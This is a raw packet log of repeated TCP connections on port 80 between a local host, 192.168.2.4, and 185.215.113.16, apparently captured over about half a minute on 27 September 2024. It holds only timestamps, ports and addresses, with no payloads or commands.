Sep 27, 2024 00:23:20.452060938 CEST	80	49952	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:20.452300072 CEST	49953	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:20.452302933 CEST	49952	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:20.452533960 CEST	49953	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:20.457353115 CEST	80	49953	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:21.151575089 CEST	80	49953	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:21.151647091 CEST	49953	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.155136108 CEST	49953	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.155566931 CEST	49954	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.160373926 CEST	80	49953	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:21.160415888 CEST	80	49954	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:21.160432100 CEST	49953	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.160577059 CEST	49954	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.160651922 CEST	49954	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.165456057 CEST	80	49954	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:21.855674982 CEST	80	49954	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:21.857008934 CEST	49954	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.962356091 CEST	49954	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.963144064 CEST	49955	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.969291925 CEST	80	49954	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:21.969741106 CEST	80	49955	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:21.969840050 CEST	49954	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.969841957 CEST	49955	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.970164061 CEST	49955	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:21.976449013 CEST	80	49955	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:22.686058044 CEST	80	49955	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:22.686115980 CEST	49955	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:22.689131021 CEST	49955	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:22.689455986 CEST	49956	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:22.694327116 CEST	80	49956	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:22.694341898 CEST	80	49955	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:22.694406986 CEST	49956	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:22.694430113 CEST	49955	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:22.694557905 CEST	49956	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:22.699481964 CEST	80	49956	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:23.410650969 CEST	80	49956	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:23.410715103 CEST	49956	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:23.528490067 CEST	49956	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:23.528820038 CEST	49957	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:23.535175085 CEST	80	49956	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:23.535336018 CEST	49956	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:23.535336971 CEST	80	49957	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:23.535460949 CEST	49957	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:23.536144018 CEST	49957	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:23.542165041 CEST	80	49957	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:24.227636099 CEST	80	49957	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:24.227828026 CEST	49957	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:24.231187105 CEST	49957	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:24.231440067 CEST	49958	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:24.238910913 CEST	80	49958	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:24.239289045 CEST	80	49957	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:24.239398956 CEST	49957	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:24.239398956 CEST	49958	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:24.239907980 CEST	49958	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:24.246301889 CEST	80	49958	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:24.945544004 CEST	80	49958	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:24.945626974 CEST	49958	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.056065083 CEST	49958	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.056423903 CEST	49959	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.063051939 CEST	80	49959	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:25.063127041 CEST	49959	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.063205957 CEST	80	49958	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:25.063249111 CEST	49958	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.063427925 CEST	49959	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.070569992 CEST	80	49959	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:25.776386976 CEST	80	49959	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:25.780895948 CEST	49959	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.783752918 CEST	49960	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.783755064 CEST	49959	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.788644075 CEST	80	49960	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:25.789021015 CEST	80	49959	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:25.789122105 CEST	49960	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.789122105 CEST	49959	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.789406061 CEST	49960	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:25.794769049 CEST	80	49960	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:26.499041080 CEST	80	49960	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:26.499150038 CEST	49960	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:26.618256092 CEST	49960	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:26.618616104 CEST	49961	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:26.623569965 CEST	80	49961	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:26.623642921 CEST	49961	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:26.623837948 CEST	80	49960	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:26.623848915 CEST	49961	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:26.623955011 CEST	49960	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:26.629717112 CEST	80	49961	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:27.681337118 CEST	80	49961	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:27.683077097 CEST	80	49961	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:27.683159113 CEST	49961	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:27.685914040 CEST	49961	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:27.686232090 CEST	49962	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:27.691051006 CEST	80	49962	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:27.691281080 CEST	49962	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:27.691416979 CEST	80	49961	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:27.691520929 CEST	49961	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:27.691595078 CEST	49962	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:27.696741104 CEST	80	49962	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:28.396631956 CEST	80	49962	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:28.396733046 CEST	49962	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:28.510232925 CEST	49962	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:28.510381937 CEST	49963	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:28.516793966 CEST	80	49963	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:28.516895056 CEST	49963	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:28.517108917 CEST	49963	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:28.517522097 CEST	80	49962	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:28.517812967 CEST	49962	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:28.523624897 CEST	80	49963	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:29.268317938 CEST	80	49963	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:29.268383980 CEST	49963	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:29.273098946 CEST	49963	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:29.278723955 CEST	49964	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:29.279923916 CEST	80	49963	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:29.279972076 CEST	49963	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:29.285325050 CEST	80	49964	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:29.285388947 CEST	49964	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:29.285851002 CEST	49964	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:29.294428110 CEST	80	49964	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:30.041011095 CEST	80	49964	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:30.041161060 CEST	49964	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.149130106 CEST	49964	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.149674892 CEST	49965	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.154326916 CEST	80	49964	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:30.154449940 CEST	49964	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.154566050 CEST	80	49965	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:30.155477047 CEST	49965	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.156440020 CEST	49965	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.161190033 CEST	80	49965	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:30.855339050 CEST	80	49965	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:30.855420113 CEST	49965	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.858872890 CEST	49965	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.859308004 CEST	49966	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.864334106 CEST	80	49965	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:30.864389896 CEST	49965	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.864707947 CEST	80	49966	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:30.864784956 CEST	49966	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.864938974 CEST	49966	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:30.871244907 CEST	80	49966	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:31.582746983 CEST	80	49966	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:31.584846973 CEST	49966	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:31.701541901 CEST	49967	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:31.701549053 CEST	49966	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:31.706449986 CEST	80	49967	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:31.706619024 CEST	49967	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:31.707163095 CEST	80	49966	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:31.707206011 CEST	49967	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:31.707302094 CEST	49966	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:31.712033033 CEST	80	49967	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:32.416351080 CEST	80	49967	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:32.416502953 CEST	49967	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:32.419806957 CEST	49967	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:32.420296907 CEST	49968	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:32.426640987 CEST	80	49967	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:32.426955938 CEST	49967	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:32.426985025 CEST	80	49968	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:32.427289009 CEST	49968	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:32.427289009 CEST	49968	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:32.433542967 CEST	80	49968	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:33.148507118 CEST	80	49968	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:33.148602962 CEST	49968	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:33.289774895 CEST	49968	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:33.290091991 CEST	49969	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:33.296719074 CEST	80	49968	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:33.296977997 CEST	49968	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:33.297214985 CEST	80	49969	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:33.297278881 CEST	49969	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:33.297383070 CEST	49969	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:33.304011106 CEST	80	49969	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:34.007349014 CEST	80	49969	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:34.007577896 CEST	49969	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:34.076306105 CEST	49969	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:34.076777935 CEST	49970	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:34.083380938 CEST	80	49970	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:34.083504915 CEST	49970	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:34.084276915 CEST	49970	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:34.084904909 CEST	80	49969	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:34.085057974 CEST	49969	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:34.090471029 CEST	80	49970	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:34.921602011 CEST	80	49970	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:34.921658993 CEST	49970	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.040596962 CEST	49970	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.041176081 CEST	49971	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.045705080 CEST	80	49970	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:35.045761108 CEST	49970	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.045949936 CEST	80	49971	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:35.046005011 CEST	49971	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.046140909 CEST	49971	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.050926924 CEST	80	49971	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:35.927083015 CEST	80	49971	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:35.931267023 CEST	49971	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.935605049 CEST	49971	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.936244011 CEST	49972	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.940696001 CEST	80	49971	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:35.940964937 CEST	49971	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.941122055 CEST	80	49972	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:35.941210032 CEST	49972	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.941581011 CEST	49972	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:35.946331024 CEST	80	49972	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:36.647237062 CEST	80	49972	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:36.647320986 CEST	49972	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:36.758495092 CEST	49972	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:36.758793116 CEST	49973	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:36.763591051 CEST	80	49973	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:36.763669014 CEST	49973	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:36.763689041 CEST	80	49972	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:36.763734102 CEST	49972	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:36.763865948 CEST	49973	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:36.768629074 CEST	80	49973	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:37.465826035 CEST	80	49973	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:37.465915918 CEST	49973	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:37.469115019 CEST	49973	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:37.469548941 CEST	49974	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:37.474306107 CEST	80	49973	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:37.474332094 CEST	80	49974	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:37.474370003 CEST	49973	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:37.474448919 CEST	49974	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:37.475094080 CEST	49974	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:37.479821920 CEST	80	49974	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:38.207889080 CEST	80	49974	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:38.209024906 CEST	49974	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:38.321749926 CEST	49974	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:38.321758986 CEST	49975	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:38.328186989 CEST	80	49975	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:38.328347921 CEST	49975	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:38.328392982 CEST	80	49974	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:38.328540087 CEST	49975	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:38.328537941 CEST	49974	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:38.334739923 CEST	80	49975	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:39.047368050 CEST	80	49975	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:39.047427893 CEST	49975	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:39.050908089 CEST	49975	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:39.051347017 CEST	49976	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:39.056013107 CEST	80	49975	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:39.056068897 CEST	49975	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:39.056215048 CEST	80	49976	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:39.056291103 CEST	49976	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:39.056540012 CEST	49976	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:39.061256886 CEST	80	49976	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:39.801757097 CEST	80	49976	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:39.801970005 CEST	49976	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:39.915231943 CEST	49977	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:39.915235996 CEST	49976	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.137043953 CEST	80	49977	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:40.137160063 CEST	80	49976	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:40.137330055 CEST	49976	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.140775919 CEST	49977	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.140775919 CEST	49977	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.145857096 CEST	80	49977	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:40.876477003 CEST	80	49977	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:40.876550913 CEST	49977	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.879313946 CEST	49977	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.879818916 CEST	49978	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.884732008 CEST	80	49978	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:40.884800911 CEST	80	49977	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:40.884941101 CEST	49978	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.884941101 CEST	49977	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.884941101 CEST	49978	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:40.889806986 CEST	80	49978	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:41.598933935 CEST	80	49978	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:41.600960970 CEST	49978	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:41.712001085 CEST	49979	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:41.712069988 CEST	49978	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:41.718537092 CEST	80	49979	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:41.718868971 CEST	80	49978	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:41.718996048 CEST	49978	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:41.718998909 CEST	49979	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:41.719132900 CEST	49979	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:41.724581957 CEST	80	49979	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:42.429529905 CEST	80	49979	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:42.431149006 CEST	49979	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:42.434011936 CEST	49979	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:42.434026003 CEST	49980	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:42.440598011 CEST	80	49980	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:42.440929890 CEST	49980	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:42.441251040 CEST	49980	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:42.441416979 CEST	80	49979	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:42.444916010 CEST	49979	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:42.448257923 CEST	80	49980	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:43.150971889 CEST	80	49980	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:43.151071072 CEST	49980	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:43.289908886 CEST	49980	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:43.290249109 CEST	49981	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:43.299097061 CEST	80	49980	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:43.299141884 CEST	49980	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:43.299416065 CEST	80	49981	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:43.299473047 CEST	49981	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:43.299725056 CEST	49981	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:43.308451891 CEST	80	49981	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:44.038916111 CEST	80	49981	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:44.039022923 CEST	49981	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.043814898 CEST	49981	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.043814898 CEST	49982	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.052608967 CEST	80	49982	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:44.052726984 CEST	49982	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.052874088 CEST	80	49981	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:44.053030968 CEST	49981	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.053356886 CEST	49982	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.062433958 CEST	80	49982	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:44.755808115 CEST	80	49982	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:44.755862951 CEST	49982	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.867760897 CEST	49982	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.868079901 CEST	49983	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.874273062 CEST	80	49982	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:44.874326944 CEST	49982	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.874608994 CEST	80	49983	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:44.874675989 CEST	49983	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.874939919 CEST	49983	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:44.881715059 CEST	80	49983	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:45.608221054 CEST	80	49983	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:45.608334064 CEST	49983	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:45.611201048 CEST	49983	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:45.611202955 CEST	49984	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:45.618088007 CEST	80	49984	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:45.618647099 CEST	49984	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:45.618668079 CEST	80	49983	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:45.618751049 CEST	49983	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:45.618876934 CEST	49984	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:45.625154972 CEST	80	49984	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:46.315346956 CEST	80	49984	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:46.315599918 CEST	49984	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:46.430368900 CEST	49984	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:46.430727959 CEST	49985	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:46.437370062 CEST	80	49985	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:46.437820911 CEST	80	49984	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:46.437928915 CEST	49985	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:46.437937021 CEST	49984	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:46.438468933 CEST	49985	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:46.445130110 CEST	80	49985	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:47.148085117 CEST	80	49985	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:47.148156881 CEST	49985	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.152302980 CEST	49985	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.152740002 CEST	49986	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.160043955 CEST	80	49985	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:47.160094023 CEST	49985	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:47.160448074 CEST	80	49986	185.215.113.16	192.168.2.4
